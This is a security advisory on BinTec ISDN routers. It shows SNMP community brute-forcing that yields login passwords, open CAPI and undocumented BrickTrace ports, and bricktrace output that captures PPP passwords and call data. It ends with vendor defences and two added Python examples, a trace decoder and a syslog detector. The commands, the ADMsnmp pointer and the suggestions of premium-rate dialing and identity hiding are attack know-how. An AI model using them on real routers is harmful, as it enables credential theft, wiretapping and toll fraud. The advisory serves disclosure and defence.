COMMAND
BinTec router
SYSTEMS AFFECTED
BinTec ISDN router family
PROBLEM
The following is based on a TESO Security Advisory. By
brute-forcing SNMP community names one can obtain the management
account passwords, which are identical to the SNMP community
names. Additionally, the MIB tree holds security-related
information that should not be accessible via read-only SNMP.
These routers also offer services that can be abused rather
easily, such as dialing out and obtaining full line access via a
CAPI interface, or a debugging interface that reveals all
information sent over the BRI lines. (Both services are open by
default, and the debugging service is barely documented.) This
was tested on:
- BIANCA/BRICK-XL
- BIANCA/BRICK-XS
Example system setup for the examples given
===========================================
admin  Login Password/SNMP Community  bitkoenig
read   Login Password/SNMP Community  rince
write  Login Password/SNMP Community  guenthi
Defaults are: admin/bintec, read/public and write/public
Example of Read-Only SNMP output from a BinTec router
=====================================================
syslog:
bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.1.12.1
[...]
enterprises.272.4.1.12.1.4.954440111.7.39 = "citykom-muenster:
local IP address is 195.202.40.124, remote is 195.202.32.121"
enterprises.272.4.1.12.1.4.954440116.7.40 =
"LOGOUT as admin from TELNET 192.168.0.100 at Thu Mar 30 18:15:16 2000"
enterprises.272.4.1.12.1.4.954440685.7.41 =
"LOGIN as admin from TELNET 192.168.0.100 at Thu Mar 30 18:24:45 2000"
enterprises.272.4.1.12.1.4.954440692.7.42 =
"citykom-muenster: outgoing connection closed, duration 583 sec, 18194
bytes received, 4934 bytes sent, 6 charging units, 0 charging amounts"
enterprises.272.4.1.12.1.4.954440692.7.43 =
"ISDN: 30.03.2000,18:15:08,18:24:52,583,18596,5306,134,124,6 Units,O,,
609910,7/0,0,0B,citykom-muenster"
[...]
capi-user-db:
bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.7.8.1
enterprises.272.4.7.8.1.1.7.100.101.102.97.117.108.116.0 = "default"
/* username */
enterprises.272.4.7.8.1.2.7.100.101.102.97.117.108.116.0 = ""
/* password */
enterprises.272.4.7.8.1.6.7.100.101.102.97.117.108.116.0 = 1
/* capi access activated */
Remote CAPI Server on a BinTec router
=====================================
fefe:> ps -elf
[...]
S 0 26 1 28 0 Jan 1 ? 00:00 00:00 vcapid
[...]
Corresponding Port:
bitch:~# nmap -sS -O -p 6000 poor.brick.de
Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port State Protocol Service
6000 open tcp X11
TCP Sequence Prediction: Class=random positive increments
Difficulty=1894 (Medium)
Remote operating system guess:
Bintec Brick XS SW Release 4.9.1 ISDN access router
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
BrickTrace Server on a BinTec router:
=====================================
fefe:> ps -elf
[...]
S 0 24 1 28 0 Jan 1 ? 00:04 00:01 traced
[...]
Corresponding Port:
bitch:~# nmap -sS -O -p 7000 poor.brick.de
Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port State Protocol Service
6000 open tcp afs3-fileserver
TCP Sequence Prediction: Class=random positive increments
Difficulty=1894 (Medium)
Remote operating system guess:
Bintec Brick XS SW Release 4.9.1 ISDN access router
Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
BrickTracing a password from an outgoing PPP connection
========================================================
bitch:~$ bricktrace -h2pi 1 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 1 Unit 0 Slot 2 /* Tracing the B-Channel */
[...]
020721.320 X DATA[0025]
0000: ff 03 c0 23 01 01 00 15 08 73 68 6f 6c 74 77 69 ...#.....user
0010: 73 07 72 65 74 68 6f 6f 6f .password
PPP packet protocol 0xc023 (PAP)
ID 1 PAP Authenticate-Request Peer-ID user Password password
A=FF UI
[...]
Snooping an S0 Bus for telephone calls
======================================
bitch:~$ bricktrace -h3 0 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 0 Unit 0 Slot 2 /* Tracing the D-Channel */
[...]
021096.656 R DATA[0015]
0000: 02 b3 10 1a 08 01 81 0d 18 01 89 1e 02 82 88 ...............
PD=08 Dest CR=01 SETUP ACKNOWLEDGE
IE-Element : Channel Identification :
Interface implicitly identified
Interface type S0
Channelnumber is exclusive (accept only this)
Identified Channel is not D-Channel
Selected Channel : B1-Channel
IE-Element : Progress Indicator reports
In-band information now available
[...]
021105.366 R DATA[0008]
0000: 02 b3 12 2e 08 01 81 02 ........
PD=08 Dest CR=01 CALL PROCEEDING
021108.076 R DATA[0012]
0000: 02 b3 14 2e 08 01 81 01 1e 02 82 88 ............
PD=08 Dest CR=01 ALERT
IE-Element : Progress Indicator reports
In-band information now available
[...]
021124.748 R DATA[0028]
0000: 02 b3 16 2e 08 01 81 07 29 05 00 03 1e 12 23 4c ........).....#L
0010: 0b 21 83 31 33 30 31 31 32 31 31 32 .!.130112112
PD=08 Dest CR=01 CONNECT
IE-Element : Date yy.mm.dd-hh:mm : 0.3.30-18:35:134597435
IE-Element : Unknown IE-Element 0x4c in Codeset 0
[...]
021130.282 R DATA[0045]
0000: 02 b3 1a 32 08 01 81 4d 1c 16 91 a1 13 02 02 c4 ...2...M........
0010: 37 02 01 22 30 0a a1 05 30 03 02 01 00 82 01 01 7.."0...0.......
0020: 28 0b 30 20 45 69 6e 68 65 69 74 65 6e (.0 Einheiten
PD=08 Dest CR=01 RELEASE
IE-Element : Facility
Service discriminator is supplement. application
Component tag is invoke
integer (0x2)
50231
integer (0x1)
34
sequence (0xa)
{
GetNextRequest (0x5)
{
sequence (0x3)
{
integer (0x1)
0
}
}
GetResponse (0x1)
}
IE-Element : Display : 0 Einheiten
[...]
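To make concrete what the D-channel trace above exposes, here is an added decoder (not part of the advisory, and not BinTec's bricktrace tool) that parses the hex dumps exactly as bricktrace prints them and names the Q.931 message type and information elements: call progress, date/time, the connected number and the charging display, all readable by anyone who can reach the TRACE port. Message-type and IE codes are ITU-T Q.931 values; the handling of the leading LAPD octets and the use of the DATA[...] header as the frame length are assumptions about the dump layout. The three records embedded below are copied from the trace output above.

```python
"""Decode the D-channel (Q.931) frames in the BrickTrace dumps above.

Added example, not part of the advisory or of BinTec's bricktrace tool.
Message-type and IE codes are ITU-T Q.931 values; the LAPD header handling
and the use of the DATA[...] header as frame length are assumptions.
"""
import re

MESSAGE_TYPES = {   # ITU-T Q.931 call-control message types
    0x01: "ALERTING", 0x02: "CALL PROCEEDING", 0x03: "PROGRESS", 0x05: "SETUP",
    0x07: "CONNECT", 0x0d: "SETUP ACKNOWLEDGE", 0x0f: "CONNECT ACKNOWLEDGE",
    0x45: "DISCONNECT", 0x4d: "RELEASE", 0x5a: "RELEASE COMPLETE",
    0x6e: "NOTIFY", 0x75: "STATUS ENQUIRY", 0x7b: "INFORMATION", 0x7d: "STATUS",
}
IE_NAMES = {   # variable-length information elements, codeset 0
    0x04: "Bearer capability", 0x08: "Cause", 0x14: "Call state",
    0x18: "Channel identification", 0x1c: "Facility", 0x1e: "Progress indicator",
    0x28: "Display", 0x29: "Date/time", 0x2c: "Keypad facility",
    0x4c: "Connected number", 0x6c: "Calling party number", 0x70: "Called party number",
    0x7c: "Low layer compatibility", 0x7d: "High layer compatibility",
}
HEXLINE = re.compile(r"^\s*[0-9a-fA-F]{4}:((?:\s+[0-9a-fA-F]{2}){1,16})")

def parse_trace_record(record):
    """Bytes of one bricktrace record: a 'DATA[nnnn]' header line plus hex lines.

    The ASCII column is dropped by the 16-byte cap per line and by truncating
    to the length in the header, so it can never be read as frame data.
    """
    length, out = None, bytearray()
    for line in record.strip().splitlines():
        if (h := re.search(r"DATA\[(\d+)\]", line)):
            length = int(h.group(1))
        elif (m := HEXLINE.match(line)):
            out += bytes.fromhex(m.group(1))
    return bytes(out[:length])

def decode_q931(frame):
    """Strip the LAPD header and decode the Q.931 message; None if not call control."""
    ctl_len = 1 if frame[2] & 0x03 == 0x03 else 2   # U-frame: 1 control octet, I/S: 2
    body = frame[2 + ctl_len:]
    if not body or body[0] != 0x08:                  # protocol discriminator 0x08 = Q.931
        return None
    cr_len = body[1] & 0x0f
    cr = int.from_bytes(body[2:2 + cr_len], "big")
    to_originator = bool(cr_len and body[2] & 0x80)  # flag bit: 1 = sent towards the originator
    if cr_len:
        cr &= (1 << (8 * cr_len - 1)) - 1            # drop the flag bit from the reference
    pos = 2 + cr_len
    msg, pos = body[pos] & 0x7f, pos + 1
    ies = []
    while pos < len(body):
        ident = body[pos]
        if ident & 0x80:                              # single-octet IE (shift, sending complete, ...)
            ies.append({"id": ident, "name": "single-octet", "data": b""})
            pos += 1
        else:
            n = body[pos + 1]
            ies.append({"id": ident, "name": IE_NAMES.get(ident, "Unknown 0x%02x" % ident),
                        "data": bytes(body[pos + 2:pos + 2 + n])})
            pos += 2 + n
    return {"message": MESSAGE_TYPES.get(msg, "Unknown 0x%02x" % msg), "call_ref": cr,
            "to_originator": to_originator, "ies": ies}

def describe_ie(ie):
    """Human-readable content of the IEs that carry personal or billing data."""
    d = ie["data"]
    if ie["id"] == 0x28:                              # Display: free text, e.g. charging units
        return d.decode("latin-1")
    if ie["id"] == 0x29 and len(d) >= 5:              # Date/time: yy mm dd hh mm [ss]
        return "%02d.%02d.%02d %02d:%02d" % tuple(d[:5])
    if ie["id"] in (0x4c, 0x6c, 0x70) and d:          # number IEs: octet 3 [3a] then IA5 digits
        skip = 1 if d[0] & 0x80 else 2                # ext bit clear -> octet 3a follows
        return d[skip:].decode("ascii", "replace")
    return d.hex()

# The three records below are copied from the trace output in the advisory above.
SETUP_ACK = """021096.656 R DATA[0015]
0000: 02 b3 10 1a 08 01 81 0d 18 01 89 1e 02 82 88 ..............."""
CONNECT = """021124.748 R DATA[0028]
0000: 02 b3 16 2e 08 01 81 07 29 05 00 03 1e 12 23 4c ........).....#L
0010: 0b 21 83 31 33 30 31 31 32 31 31 32 .!.130112112"""
RELEASE = """021130.282 R DATA[0045]
0000: 02 b3 1a 32 08 01 81 4d 1c 16 91 a1 13 02 02 c4 ...2...M........
0010: 37 02 01 22 30 0a a1 05 30 03 02 01 00 82 01 01 7.."0...0.......
0020: 28 0b 30 20 45 69 6e 68 65 69 74 65 6e (.0 Einheiten"""

def summarize(record):
    """One line per message: type, call reference and the readable IE contents."""
    q = decode_q931(parse_trace_record(record))
    parts = ["%s (CR %d)" % (q["message"], q["call_ref"])]
    parts += ["%s=%s" % (ie["name"], describe_ie(ie)) for ie in q["ies"]]
    return "; ".join(parts)

if __name__ == "__main__":
    for rec in (SETUP_ACK, CONNECT, RELEASE):
        print(summarize(rec))
```

The CONNECT record decodes to the date/time 00.03.30 18:35 and the connected number 130112112, and the RELEASE record to the display text "0 Einheiten", matching what bricktrace itself printed above; the IE the tool reported as "Unknown IE-Element 0x4c" is the Q.931 Connected number, so the trace exposes the far-end number of every call as well.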
Checking line status from BinTec's httpd:
=========================================
[...]
Hardware Interfaces
Slot 1 Ethernet o.k.
Slot 2 ISDN S2M o.k. used 13, available 17
- - X X X X X - X -
- - X - X - - X - -
X - - - X - - X - X
[...]
Now we know what to sniff.
Sniffing an inbound PPP connection on line 4, slot 2:
bitch:~$ bricktrace -h2pit 4 0 2
bricktrace: Connected to aaa.bbb.ccc.ddd(7000)
Tracing: Channel 4 Unit 0 Slot 2
[...]
004419.999 X DATA[0045]
0000: 21 45 00 00 2c 39 07 40 00 3e 06 f5 cc c2 61 44 !E..,9.@.>....aD
0010: 0d c2 61 45 28 00 50 da 79 bc f8 a9 a7 02 2b c5 ..aE(.P.y.....+.
0020: 7a 60 12 44 70 3c z.Dp<
Compressed PPP packet protocol 0x21 (TCP/IP)
A=21 RNR P/F=0 N(R)=2
IP-Packet from aaa.bbb.ccc.ddd to a.b.c.d protocol 0x6
TCP-Message, sourceport 80 destinationport 55929
sequence number 3170412967
acknowledgement number 36423034
offset 6 flags ACK SYN
window 17520 checksum 0x3c9e urgent 0
[...]
004420.640 R DATA[0609]
0000: 2d 70 0e b0 43 ff 47 45 54 20 68 74 74 70 3a 2f -p..C.GET http:/
0010: 2f 63 68 61 74 33 2e 70 6c 61 79 67 72 6f 75 6e /chat3.playgroun
0020: 64 2e 64 65 2f 63 d.de/c
Compressed PPP packet protocol 0x2d (VJ Compressed TCP/IP)
A=2D I P/F=1 N(R)=3 N(S)=0
0E B0 C FF G E T h t t p : / / c h a t 3
. p l a y g r o u n d . d e / c h a t
IP-Packet from a to b protocol 0x2f
[...]
The impact is as follows:
(1) SNMP communities / login passwords
By using standard brute-force methods, the SNMP community
string, and therefore the login passwords, can be obtained.
One program that does this is ADMsnmp, which has to be fed a
wordlist. Brute-forcing this way is quite effective: about
500-1000 words per minute (which of course depends on your
and the router's connectivity). The program is available
from
ftp://adm.freelsd.net/pub/ADM/ADMsnmp.0.1.tgz
Brute-forcing the passwords directly via telnet isn't feasible
because the router slows down after approx. 6 tries.
(2) Using the CAPI facility
Nearly any router can be used remotely as an 'ISDN line
provider': you can use the BRI lines of the router if they
are not password protected. In a short survey, most machines
we encountered proved to be vulnerable, i.e. they had no
restrictions set at all. The CAPI daemon listens on port
6000, as shown in the tests above. This feature can, for
example, be exploited by dialing expensive numbers (0900 or
0190 [in DE] lines). You may also hide your real identity by
calling a 'call-by-call' ISP, which gives you another IP
address to work from. A (R)CAPI library for Un*x exists that
can be used for these attacks. It is available via
ftp://ftp.bintec.de/pub/brick/libcapi/
There is also a CAPI user interface for MS Windows, called
Brickware, which can be obtained via
ftp://ftp.bintec.de/pub/brick/brickware/
Firmware before 5.1.x seems generally not to be passworded;
TESO has not checked 5.1.x yet.
(3) Using BrickTrace for snooping BRI lines
You can gather information about the ISP or corporation
running these routers with open BrickTrace ports (port 7000
by default) using a program called bricktrace, which is
available via
ftp://ftp.bintec.de/pub/brick/unixtool/
The documentation does not even mention this port (!). See
'Solution' for how to turn it off. As shown above, all data
passing over the line is visible, so you also obtain the
users' passwords and can see what they do on the net (in
effect the port is a dedicated sniffer). This sniffing
technique may also reveal private information of
corporations: it is not restricted to Internet traffic but
also covers 'intranet' lines that use the same router, as
well as telephony networks (S0 bus).
The bug-discovery and the demonstration are due to Stephan
Holtwisch.
SOLUTION
1. Detecting and defending SNMP-Brute Force Access
==================================================
Brute-force guessing of the management account passwords of a
Bintec router via SNMP can be detected and prevented in the
following ways:
Detection:
Every system access with an invalid management account password
is detected by the router and logged (locally, via the console,
and via syslog to one or more external hosts). In addition,
SNMP requests with invalid community names cause an SNMP
trap.
Defense:
We recommend using one or more of the following three methods to
deny SNMP access from untrusted WAN interfaces or to restrict
SNMP access to trusted IP addresses.
a) Use of Network Address Translation
The use of NAT will allow outgoing connections but deny any
incoming connections from hosts on the other side of the
WAN interface. This is also the default configuration for
Internet access when the Bintec router is configured via
the Wizard. Bintec routers can also offer a special NAT
mode without address translation, i.e. packets travelling
through the router are not modified, but connections from
outside are still denied.
b) Use of Access Lists
Filters and access lists can be defined for every interface.
They can be used to grant access to local services via
trusted IP addresses and/or trusted interfaces only, and deny
the access to all others.
c) Use of "Local Service" Access Lists
There are also two SNMP tables on the system that specify the
trusted IP addresses allowed to connect to any local service
(localtcpallowtable and localudpallowtable). These tables
are easier to handle and set up than access lists. Beginning
with release 5.2.1, this configuration will be accessible via
the built-in SETUP tool.
2. Defending SNMP Access to security related information
========================================================
To protect the security-related information in the private
MIBs from SNMP access, SNMP access has to be restricted. Again
we recommend using one or more of the three methods described
in sections 1a) to 1c).
3. Detecting and Defending abuse of other local services
========================================================
The abuse of other local services such as CAPI, TAPI and TRACE
can be detected and prevented in the following ways:
Detection:
Every CAPI, TAPI and trace connection is detected and logged
(locally, via the console, and via syslog to one or more
external hosts). The syslog entry includes the timestamp,
source IP address/port and type of service. If connections
are established or accepted via CAPI and/or TAPI, the
timestamp, duration, number and charging information are
logged together with the source IP address of the TAPI/CAPI
user.
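The detection notes in sections 1 and 3 describe what the router logs but not how to act on it. The following added example (not part of the advisory or of any BinTec tool) reads router syslog lines and raises findings for the three event kinds the page mentions: management logins (the LOGIN/LOGOUT format is the one visible in the snmpwalk of the syslog table above), rejected SNMP community names, and CAPI/TAPI/TRACE connections. Only the LOGIN/LOGOUT line format comes from the page; the two other line formats, the trusted management network and the thresholds are constructed assumptions, and the sample log is constructed apart from the two LOGIN/LOGOUT entries copied from the page.

```python
"""Review BinTec syslog output for the events the vendor's detection notes rely on.

Added example, not part of the advisory or of any BinTec tool. Only the
LOGIN/LOGOUT line format is taken from the page; the SNMP-rejection and
service-connection formats, the trusted network and the thresholds are
assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

TS = r"(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4})"
# Format shown in the router's syslog table above
LOGIN_RE = re.compile(r"^(?P<event>LOGIN|LOGOUT) as (?P<user>\S+) from (?P<proto>\S+) "
                      r"(?P<src>[\d.]+) at " + TS + "$")
# Assumed format for requests with an invalid community name (section 1, Detection)
BADCOMM_RE = re.compile(r"^SNMP: invalid community from (?P<src>[\d.]+) at " + TS + "$")
# Assumed format for CAPI/TAPI/TRACE connections (section 3, Detection)
SERVICE_RE = re.compile(r"^(?P<svc>CAPI|TAPI|TRACE): connection from "
                        r"(?P<src>[\d.]+):(?P<port>\d+) at " + TS + "$")

TRUSTED = [ip_network("192.168.0.0/24")]   # assumed management LAN
WINDOW_SECONDS = 60
MAX_BAD_COMMUNITIES = 20   # well below the 500-1000 guesses/minute cited for ADMsnmp

def parse_ts(s):
    return datetime.strptime(s, "%a %b %d %H:%M:%S %Y")

def trusted(src):
    return any(ip_address(src) in net for net in TRUSTED)

def analyse(lines):
    """Return (severity, message) findings, in log order."""
    findings = []
    recent = defaultdict(deque)   # src -> timestamps of rejected communities in the window
    for line in lines:
        line = line.strip()
        if m := LOGIN_RE.match(line):
            if m["event"] == "LOGIN" and not trusted(m["src"]):
                findings.append(("HIGH", "login as %s via %s from untrusted %s at %s"
                                 % (m["user"], m["proto"], m["src"], m["ts"])))
        elif m := BADCOMM_RE.match(line):
            q, ts = recent[m["src"]], parse_ts(m["ts"])
            q.append(ts)
            while (ts - q[0]).total_seconds() > WINDOW_SECONDS:
                q.popleft()
            if len(q) == MAX_BAD_COMMUNITIES:   # fires once, when the threshold is crossed
                findings.append(("HIGH", "%d rejected SNMP communities from %s within %ds: brute force"
                                 % (len(q), m["src"], WINDOW_SECONDS)))
        elif m := SERVICE_RE.match(line):
            if not trusted(m["src"]):
                findings.append(("HIGH", "%s connection from untrusted %s:%s at %s"
                                 % (m["svc"], m["src"], m["port"], m["ts"])))
            elif m["svc"] == "TRACE":   # undocumented port: every session deserves a look
                findings.append(("MEDIUM", "TRACE session from %s:%s at %s"
                                 % (m["src"], m["port"], m["ts"])))
    return findings

def sample_log():
    """Constructed sample: two genuine entries from the advisory plus invented ones."""
    base, fmt = datetime(2000, 3, 30, 18, 30, 0), "%a %b %d %H:%M:%S %Y"
    lines = [
        "LOGOUT as admin from TELNET 192.168.0.100 at Thu Mar 30 18:15:16 2000",
        "LOGIN as admin from TELNET 192.168.0.100 at Thu Mar 30 18:24:45 2000",
    ]
    # 25 rejected community names in 25 seconds from one outside host (a wordlist run)
    lines += ["SNMP: invalid community from 10.1.2.3 at "
              + (base + timedelta(seconds=i)).strftime(fmt) for i in range(25)]
    # three rejections from the LAN spread over six minutes (an operator's typos)
    lines += ["SNMP: invalid community from 192.168.0.7 at "
              + (base + timedelta(minutes=3 * i)).strftime(fmt) for i in range(3)]
    lines.append("TRACE: connection from 192.168.0.100:40211 at Thu Mar 30 18:30:40 2000")
    lines.append("CAPI: connection from 10.1.2.3:1025 at Thu Mar 30 18:30:50 2000")
    lines.append("LOGIN as admin from TELNET 10.1.2.3 at Thu Mar 30 18:31:02 2000")
    return lines

if __name__ == "__main__":
    for severity, msg in analyse(sample_log()):
        print(severity, msg)
```

Run against the constructed sample, this yields one brute-force finding for 10.1.2.3 (raised on the twentieth rejection, not on every later one), a medium finding for the LAN-side TRACE session, and high findings for the CAPI connection and the admin login from outside the trusted network; the three LAN-side typos stay silent because they never reach the threshold inside one window. In practice the lines would come from the syslog host configured under Detection, or from walking the syslog table over SNMP as shown earlier.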
Defense:
We recommend using one or more of the three methods described
in sections 1a) to 1c) to deny CAPI/TAPI or TRACE access from
untrusted WAN interfaces or to restrict that access to trusted
IP addresses.